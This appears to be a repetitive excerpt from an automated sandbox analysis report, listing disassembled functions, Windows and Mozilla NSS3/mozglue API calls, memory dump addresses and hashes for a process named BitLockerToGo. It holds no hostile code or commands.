                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1978757487-0
                                                                                                                                                      • Opcode ID: 426efe848534f16d3cbf396d8464283d5b8111ea0e1551e33a5c68ac5fbf15e7
                                                                                                                                                      • Instruction ID: 79f39155525d8f56ca3469228d4664e2013b142d5ec48617bdefb9357dfac8f9
                                                                                                                                                      • Opcode Fuzzy Hash: 426efe848534f16d3cbf396d8464283d5b8111ea0e1551e33a5c68ac5fbf15e7
                                                                                                                                                      • Instruction Fuzzy Hash: 51216D709097259BCB04AF29C4841A9BBF4BF48318F41956FE998D7B40DB34E864CBD5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C951E10: TlsGetValue.KERNEL32 ref: 6C951E36
                                                                                                                                                        • Part of subcall function 6C951E10: EnterCriticalSection.KERNEL32(?,?,?,6C92B1EE,2404110F,?,?), ref: 6C951E4B
                                                                                                                                                        • Part of subcall function 6C951E10: PR_Unlock.NSS3 ref: 6C951E76
                                                                                                                                                      • free.MOZGLUE(?,6C93D079,00000000,00000001), ref: 6C93CDA5
                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,6C93D079,00000000,00000001), ref: 6C93CDB6
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C93D079,00000000,00000001), ref: 6C93CDCF
                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,6C93D079,00000000,00000001), ref: 6C93CDE2
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C93CDE9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1720798025-0
                                                                                                                                                      • Opcode ID: 0fe7e8ec8ebec99cfc5fe79e9d74db6fa1b85698bf860e5c040a2e97f6fdb970
                                                                                                                                                      • Instruction ID: 64be9784fa042b721682d23f800b69b3d4d7c8b6839c7127ef096992e2ec53a3
                                                                                                                                                      • Opcode Fuzzy Hash: 0fe7e8ec8ebec99cfc5fe79e9d74db6fa1b85698bf860e5c040a2e97f6fdb970
                                                                                                                                                      • Instruction Fuzzy Hash: 2D11A0B2B01636ABDF01AE66EC44AA6B76DFF1426D7104221F91D87E01E732E434C7E1
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C9A5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C9A5B56
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9A2CEC
                                                                                                                                                        • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C9A2D02
                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C9A2D1F
                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C9A2D42
                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C9A2D5B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1593528140-0
                                                                                                                                                      • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                      • Instruction ID: 81d9c04def9023ed81daece0f990418b5cb9ac2da7536969a0685eccc10aa04c
                                                                                                                                                      • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                      • Instruction Fuzzy Hash: 590108B5A10A00ABE7309E6AFC40BD7B3B5EF61318F014535E85D96711D632F816C792
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C9A5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C9A5B56
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9A2D9C
                                                                                                                                                        • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C9A2DB2
                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C9A2DCF
                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C9A2DF2
                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C9A2E0B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1593528140-0
                                                                                                                                                      • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                      • Instruction ID: 47406e1d01c6c627b6895533ce2d215cb7da3baddbecaa38b139cd1f2b73dc42
                                                                                                                                                      • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                      • Instruction Fuzzy Hash: 500104B5A00A00ABEB309E6AFC00BD7B3A5EF61318F014434E84D97B11D632F826C692
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C923090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C93AE42), ref: 6C9230AA
                                                                                                                                                        • Part of subcall function 6C923090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9230C7
                                                                                                                                                        • Part of subcall function 6C923090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C9230E5
                                                                                                                                                        • Part of subcall function 6C923090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C923116
                                                                                                                                                        • Part of subcall function 6C923090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C92312B
                                                                                                                                                        • Part of subcall function 6C923090: PK11_DestroyObject.NSS3(?,?), ref: 6C923154
                                                                                                                                                        • Part of subcall function 6C923090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C92317E
                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C9199FF,?,?,?,?,?,?,?,?,?,6C912D6B,?), ref: 6C93AE67
                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C9199FF,?,?,?,?,?,?,?,?,?,6C912D6B,?), ref: 6C93AE7E
                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C912D6B,?,?,00000000), ref: 6C93AE89
                                                                                                                                                      • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C912D6B,?,?,00000000), ref: 6C93AE96
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C912D6B,?,?), ref: 6C93AEA3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 754562246-0
                                                                                                                                                      • Opcode ID: a27b3d2277900275f0b93e782e5c555682b4695a607629d8f029347e0e58464b
                                                                                                                                                      • Instruction ID: cfbc183d731369e4019aaeae4178b5a5a47055000e0df58715a79cab30c10962
                                                                                                                                                      • Opcode Fuzzy Hash: a27b3d2277900275f0b93e782e5c555682b4695a607629d8f029347e0e58464b
                                                                                                                                                      • Instruction Fuzzy Hash: 6E01D166B1443057EB2191ECAC99AAB31588BA765CB081031E80EC7B81FB26DD0543A3
                                                                                                                                                      APIs
                                                                                                                                                      • DeleteCriticalSection.KERNEL32(6CA2A6D8), ref: 6CA2AE0D
                                                                                                                                                      • free.MOZGLUE(?), ref: 6CA2AE14
                                                                                                                                                      • DeleteCriticalSection.KERNEL32(6CA2A6D8), ref: 6CA2AE36
                                                                                                                                                      • free.MOZGLUE(?), ref: 6CA2AE3D
                                                                                                                                                      • free.MOZGLUE(00000000,00000000,?,?,6CA2A6D8), ref: 6CA2AE47
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$CriticalDeleteSection
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 682657753-0
                                                                                                                                                      • Opcode ID: 980b8d6ddc094b039aa8dad91ab585d5fa65c2385d1c46db9fb897c6319ac188
                                                                                                                                                      • Instruction ID: 80db66bf3bfa61816d73706661e980b23310b149f7311acf12295bec328ed1fb
                                                                                                                                                      • Opcode Fuzzy Hash: 980b8d6ddc094b039aa8dad91ab585d5fa65c2385d1c46db9fb897c6319ac188
                                                                                                                                                      • Instruction Fuzzy Hash: CEF0F6B5201B16ABCF049F69D8089277779BF867787184329E52A83940D739E513C7D1
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                        • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D4F2
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D50B
                                                                                                                                                        • Part of subcall function 6C7FCFE0: EnterCriticalSection.KERNEL32(6C87E784), ref: 6C7FCFF6
                                                                                                                                                        • Part of subcall function 6C7FCFE0: LeaveCriticalSection.KERNEL32(6C87E784), ref: 6C7FD026
                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D52E
                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C87E7DC), ref: 6C81D690
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D751
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                      • String ID: MOZ_CRASH()
                                                                                                                                                      • API String ID: 3805649505-2608361144
                                                                                                                                                      • Opcode ID: e1206dc03a5a6169008dc6e7fb783f1fff7d57fcdb5b4d6e69ddaca2a5139944
                                                                                                                                                      • Instruction ID: 47e816ca9e803762a5f3e404620943a745771fc68650ae1873cb260d32701b67
                                                                                                                                                      • Opcode Fuzzy Hash: e1206dc03a5a6169008dc6e7fb783f1fff7d57fcdb5b4d6e69ddaca2a5139944
                                                                                                                                                      • Instruction Fuzzy Hash: F751B171A087128FD735CF28C29476AB7E1EB89308F544E2ED559C7F45E774A840CBA1
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C7F4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C833EBD,6C833EBD,00000000), ref: 6C7F42A9
                                                                                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C84B127), ref: 6C84B463
                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C84B4C9
                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C84B4E4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                      • String ID: pid:
                                                                                                                                                      • API String ID: 1720406129-3403741246
                                                                                                                                                      • Opcode ID: abe79b4013cf78f987065a7d1a201615ab9ed9db63790d2d86b2ed279e8044c8
                                                                                                                                                      • Instruction ID: c5ed005e413d1abd899575f70d970794e46f89d80575514758e21ce33caf974b
                                                                                                                                                      • Opcode Fuzzy Hash: abe79b4013cf78f987065a7d1a201615ab9ed9db63790d2d86b2ed279e8044c8
                                                                                                                                                      • Instruction Fuzzy Hash: 32311031A01A1C8FCB20DFA9DA84AFEB7B5BF45318F544D29D81167A41E731E849CBE1
                                                                                                                                                      APIs
                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C8A6D36
                                                                                                                                                      Strings
                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C8A6D2F
                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8A6D20
                                                                                                                                                      • database corruption, xrefs: 6C8A6D2A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                      • API String ID: 632333372-598938438
                                                                                                                                                      • Opcode ID: be7300625078fff3916dfad94f6982fed7af0e56c0f56f8017d39abc535bf911
                                                                                                                                                      • Instruction ID: 4b33e74a8d73952baa1f15fc11e52287423b5446e2fa13fbb5a76ab6311a513d
                                                                                                                                                      • Opcode Fuzzy Hash: be7300625078fff3916dfad94f6982fed7af0e56c0f56f8017d39abc535bf911
                                                                                                                                                      • Instruction Fuzzy Hash: 7B2102306003059BC3208E5DCA41B5AB7F2BF80349F148D2CD84AABF55E372F94687A2
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C9DCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C9DCC7B), ref: 6C9DCD7A
                                                                                                                                                        • Part of subcall function 6C9DCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C9DCD8E
                                                                                                                                                        • Part of subcall function 6C9DCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C9DCDA5
                                                                                                                                                        • Part of subcall function 6C9DCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C9DCDB8
                                                                                                                                                      • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C9DCCB5
                                                                                                                                                      • memcpy.VCRUNTIME140(6CA714F4,6CA702AC,00000090), ref: 6C9DCCD3
                                                                                                                                                      • memcpy.VCRUNTIME140(6CA71588,6CA702AC,00000090), ref: 6C9DCD2B
                                                                                                                                                        • Part of subcall function 6C8F9AC0: socket.WSOCK32(?,00000017,6C8F99BE), ref: 6C8F9AE6
                                                                                                                                                        • Part of subcall function 6C8F9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C8F99BE), ref: 6C8F9AFC
                                                                                                                                                        • Part of subcall function 6C900590: closesocket.WSOCK32(6C8F9A8F,?,?,6C8F9A8F,00000000), ref: 6C900597
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                      • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                      • API String ID: 1231378898-412307543
                                                                                                                                                      • Opcode ID: 02048f4653853a9f9ce99584df64dcf7f9502850713d7be9d9f3ad8c8e315e75
                                                                                                                                                      • Instruction ID: 19e024a4d8fd6c8aea3c2b4e2c79a081a882536b859197bde4fdfd2fe8a28638
                                                                                                                                                      • Opcode Fuzzy Hash: 02048f4653853a9f9ce99584df64dcf7f9502850713d7be9d9f3ad8c8e315e75
                                                                                                                                                      • Instruction Fuzzy Hash: 5B11C3F9B003715EDB198F6D9817B623AF8B316218F089129E70DDBB40E635C48647F1
                                                                                                                                                      APIs
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C840CD5
                                                                                                                                                        • Part of subcall function 6C82F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C82F9A7
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C840D40
                                                                                                                                                      • free.MOZGLUE ref: 6C840DCB
                                                                                                                                                        • Part of subcall function 6C815E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C815EDB
                                                                                                                                                        • Part of subcall function 6C815E90: memset.VCRUNTIME140(6C857765,000000E5,55CCCCCC), ref: 6C815F27
                                                                                                                                                        • Part of subcall function 6C815E90: LeaveCriticalSection.KERNEL32(?), ref: 6C815FB2
                                                                                                                                                      • free.MOZGLUE ref: 6C840DDD
                                                                                                                                                      • free.MOZGLUE ref: 6C840DF2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4069420150-0
                                                                                                                                                      • Opcode ID: 640c7d8cfad0a948cbf104cda75287c41a52a2a2a430dc8ac1bf7ccdbe0b94ea
                                                                                                                                                      • Instruction ID: 6b223cdf3ff0dc7347989780d6ff2249cd460cb5ef358d9ec34b301f28d90746
                                                                                                                                                      • Opcode Fuzzy Hash: 640c7d8cfad0a948cbf104cda75287c41a52a2a2a430dc8ac1bf7ccdbe0b94ea
                                                                                                                                                      • Instruction Fuzzy Hash: 5C4106719087848BD730CF29C28079BFBE5BFD9614F518A2EE8D887B51D7709548CB92
                                                                                                                                                      APIs
                                                                                                                                                      • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84CDA4
                                                                                                                                                        • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                        • Part of subcall function 6C84D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C84CDBA,00100000,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84D158
                                                                                                                                                        • Part of subcall function 6C84D130: InitializeConditionVariable.KERNEL32(00000098,?,6C84CDBA,00100000,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84D177
                                                                                                                                                      • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84CDC4
                                                                                                                                                        • Part of subcall function 6C847480: ReleaseSRWLockExclusive.KERNEL32(?,6C8515FC,?,?,?,?,6C8515FC,?), ref: 6C8474EB
                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84CECC
                                                                                                                                                        • Part of subcall function 6C80CA10: mozalloc_abort.MOZGLUE(?), ref: 6C80CAA2
